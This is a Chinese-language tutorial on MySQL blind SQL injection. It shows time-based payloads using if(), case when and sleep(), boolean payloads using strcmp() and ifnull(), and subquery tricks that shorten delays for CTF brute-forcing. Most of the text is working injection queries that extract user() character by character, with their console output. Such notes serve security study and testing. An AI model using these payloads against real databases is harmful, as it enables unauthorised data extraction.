0X00 盲注
- 时间盲注
- 布尔盲注
0x01简单的时间盲注
-
if()
if (expre1,expre2,expre3) 当expre1为true时,返回expre2,反之,返回expre3.
与之配合使用的常用分割函数有:substr
substring
left
mysql> select * from admin where id=1 and if((substr((select user()),1,1)='r'),sleep(5),1);
Empty set (5.01 sec)
mysql> select * from admin where id=1 and if((substr((select user()),1,1)='1r'),sleep(5),1);
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | admin |
+------+----------+----------+
1 row in set (0.00 sec)
- case when then else end
select * from admin where id=1 and case when (substr((select user()),1,1)='r') then sleep(3) else 1 end;
Empty set (3.02 sec)
mysql> select * from admin where id=1 and case when (substr((select user()),1,1)='1r') then sleep(3) else 1 end;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | admin |
+------+----------+----------+
1 row in set (0.00 sec)
0x02布尔盲注
布尔盲注主要思路有正则匹配,运算符,比较函数等
参考链接:https://www.anquanke.com/post/id/170626
- 使用比较函数strcmp()
mysql> select * from admin where id=1 and strcmp((substr((select user()),1,1)='r'),1);
Empty set (0.00 sec)
mysql> select * from admin where id=1 and strcmp((substr((select user()),1,1)='r'),0);
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | admin |
+------+----------+----------+
1 row in set (0.00 sec)
- IFNULL() 函数
mysql> select * from admin where id=1 and ifnull((substr((select user()),1,1)='r'),0);
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | admin |
+------+----------+----------+
1 row in set (0.00 sec)
mysql> select * from admin where id=1 and ifnull((substr((select user()),1,1)='1r'),0);
Empty set (0.00 sec)
0x03 子查询
在用到or的延时注入时可以用子查询缩短延时时间。当我们在做ctf
题时,使用子查询缩短时间来爆破就会凸显出它的优势。
mysql> select * from admin order by if((substr((select user()),1,1)='r'),(select 1 from(select sleep(2)) as b),password);
+------+-----------+----------+
| id | username | password |
+------+-----------+----------+
| 1 | admin | admin |
| 3 | admin'111 | 11 |
| 2 | cadmin | fdfggh |
+------+-----------+----------+
3 rows in set (2.00 sec)
mysql> select * from admin order by if((substr((select user()),1,1)='r'),sleep(2),password);
+------+-----------+----------+
| id | username | password |
+------+-----------+----------+
| 1 | admin | admin |
| 3 | admin'111 | 11 |
| 2 | cadmin | fdfggh |
+------+-----------+----------+
3 rows in set (6.05 sec)